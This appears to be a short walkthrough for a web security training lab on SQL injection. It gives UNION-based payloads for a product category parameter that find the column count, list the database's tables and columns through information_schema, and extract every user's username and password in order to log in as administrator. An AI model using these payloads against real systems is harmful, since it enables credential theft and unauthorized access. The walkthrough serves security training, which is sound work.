Use Burp Suite to intercept and modify the request that sets the product category filter.
Determine the number of columns that are being returned by the queryarrow-up-right and which columns contain text dataarrow-up-right. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter:
category
'+UNION+SELECT+'abc','def'--
Use the following payload to retrieve the list of tables in the database:
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
Find the name of the table containing user credentials.
Use the following payload (replacing the table name) to retrieve the details of the columns in the table:
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
Find the names of the columns containing usernames and passwords.
Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users:
'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
Find the password for the administrator user, and use it to log in.
administrator
Last updated 2 years ago